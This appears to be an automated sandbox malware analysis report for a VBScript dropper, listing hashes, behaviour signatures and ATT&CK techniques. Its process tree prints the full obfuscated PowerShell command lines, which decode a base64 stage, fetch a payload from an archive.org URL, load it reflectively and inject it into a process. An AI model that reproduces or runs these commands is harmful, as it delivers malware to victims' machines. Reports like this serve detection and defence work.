d88b56f3f48a8056d7bb61e6ee59cb3e403d7e15341663b8c40b71c33d4f929b

General

Target

asegurar.vbs
Size

507KB
MD5

e3cf943b60179ffa82d19c307903c57e
SHA1

e5c9f726e6731f332c1c656bad8aff63c65a31ac
SHA256

d88b56f3f48a8056d7bb61e6ee59cb3e403d7e15341663b8c40b71c33d4f929b
SHA512

d1b088a92783f795a0b3963a05f56d1232348f2210576b6cfc97ed505badde5625e871f58e56a7d7907d9fe51a824147805bf15983bc3a3c4be0e67f5e21474d
SSDEEP

12288:ajV2bhG3mz8f6ls7MKXS1O0FBA06JT3iIDcS7atUtNmrozWws+69hvrjsi:uW0dvzcUyH

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

exe.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2792	powershell.exe
6	2792	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2248	powershell.exe
2792	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2248	powershell.exe
2792	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2248	powershell.exe
Token: SeDebugPrivilege	2792	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1292 wrote to memory of 2248	1292	WScript.exe	30
PID 1292 wrote to memory of 2248	1292	WScript.exe	30
PID 1292 wrote to memory of 2248	1292	WScript.exe	30
PID 2248 wrote to memory of 2792	2248	powershell.exe	32
PID 2248 wrote to memory of 2792	2248	powershell.exe	32
PID 2248 wrote to memory of 2792	2248	powershell.exe	32

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\asegurar.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1292
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVuVjpDT21TcGVDWzQsMjQsMjVdLUpvaU4nJykgKCAoKCd7JysnMH11cmwnKycgJysnPSB7MX1odCcrJ3QnKydwczonKycvL2lhNjAnKycwMTAnKycwLnVzLmFyJysnY2hpdmUnKycub3JnJysnLzI0L2l0ZW0nKydzL2RldGFoLW4nKydvdCcrJ2Utdi9EZXRhaE5vJysndGVWJysnLnQnKyd4dHsnKycxJysnfTt7JysnMCcrJ31iYXNlNjRDb250ZScrJ250ID0gKCcrJ05ldy1PYmplJysnY3QgU3lzdGUnKydtLk5ldC5XZWJDbCcrJ2llbnQpLkQnKydvd25sb2EnKydkJysnU3RyaW5nKHswfXVybCk7ezB9YmluYXJ5Q29udGVudCcrJyA9IFtTeXN0JysnZScrJ20uQ29udmVydF06JysnOkZyb21CYXNlJysnNjRTdHJpJysnbmcoezB9YmEnKydzZScrJzY0Q29udGVudCk7ezB9YXMnKydzZW1ibHknKycgPSBbUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoezB9JysnYmluJysnYXInKyd5Q29udGVudCknKyc7ezAnKyd9dCcrJ3lwJysnZSAnKyc9JysnIHswfScrJ2FzcycrJ2UnKydtYmx5JysnLicrJ0dldFR5cGUoezF9UicrJ3VuJysnUCcrJ0UuSG9tZXsxfSknKyc7ezB9JysnbWV0aG9kJysnID0gezB9dCcrJ3lwZS5HZXQnKydNZScrJ3Rob2QoezEnKyd9VkFJezF9JysnKTt7MH1tJysnZXRob2QuSScrJ252b2tlKHswfW51bGwsICcrJ1tvYmplY3RbXV1AJysnKHsxfTAvY2tqNCcrJ1IvZC9lJysnZS5lJysndHNhcCcrJy8vOnNwdHRoezF9ICwgezF9ZCcrJ2VzYXQnKydpdmFkbycrJ3sxfSAsJysnICcrJ3snKycxJysnfWQnKydlJysnc2F0aScrJ3YnKydhZG97MX0gLCB7JysnMX1kZXNhdGl2YWQnKydvezF9LCcrJ3sxfUFkZEluJysnUHJvY2VzczMyJysnezF9JysnLHsxfXsnKycxfScrJykpJykgLWYgIFtDSEFyXTM2LFtDSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2248
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $enV:COmSpeC[4,24,25]-JoiN'') ( (('{'+'0}url'+' '+'= {1}ht'+'t'+'ps:'+'//ia60'+'010'+'0.us.ar'+'chive'+'.org'+'/24/item'+'s/detah-n'+'ot'+'e-v/DetahNo'+'teV'+'.t'+'xt{'+'1'+'};{'+'0'+'}base64Conte'+'nt = ('+'New-Obje'+'ct Syste'+'m.Net.WebCl'+'ient).D'+'ownloa'+'d'+'String({0}url);{0}binaryContent'+' = [Syst'+'e'+'m.Convert]:'+':FromBase'+'64Stri'+'ng({0}ba'+'se'+'64Content);{0}as'+'sembly'+' = [Reflection.Assembly]'+'::Load({0}'+'bin'+'ar'+'yContent)'+';{0'+'}t'+'yp'+'e '+'='+' {0}'+'ass'+'e'+'mbly'+'.'+'GetType({1}R'+'un'+'P'+'E.Home{1})'+';{0}'+'method'+' = {0}t'+'ype.Get'+'Me'+'thod({1'+'}VAI{1}'+');{0}m'+'ethod.I'+'nvoke({0}null, '+'[object[]]@'+'({1}0/ckj4'+'R/d/e'+'e.e'+'tsap'+'//:sptth{1} , {1}d'+'esat'+'ivado'+'{1} ,'+' '+'{'+'1'+'}d'+'e'+'sati'+'v'+'ado{1} , {'+'1}desativad'+'o{1},'+'{1}AddIn'+'Process32'+'{1}'+',{1}{'+'1}'+'))') -f [CHAr]36,[CHAr]39) )"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2792

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
526edaca9173907c5ea4198459d0a7e9

SHA1
f542c1a50b5650076c2606db7e0794413e69d7ba

SHA256
dd55bbacbf23e8e9aade595008a8832d78c00d55957d62e75e08b15123c18cf8

SHA512
74b30112a1d8f46fc3f9e8d590c6b4c14d747c09d1e57bb64967d1c47327fb2511ca995fcdb039ca831e71e33da642dc4d9c53a9db4bf91a7fce5193f513bc75

Download Submit
memory/2248-4-0x000007FEF540E000-0x000007FEF540F000-memory.dmp

Filesize
4KB

Download
memory/2248-5-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

Filesize
2.9MB

Download
memory/2248-7-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

Filesize
9.6MB

Download
memory/2248-6-0x00000000022D0000-0x00000000022D8000-memory.dmp

Filesize
32KB

Download
memory/2248-8-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

Filesize
9.6MB

Download
memory/2248-9-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

Filesize
9.6MB

Download
memory/2248-10-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

Filesize
9.6MB

Download
memory/2248-16-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing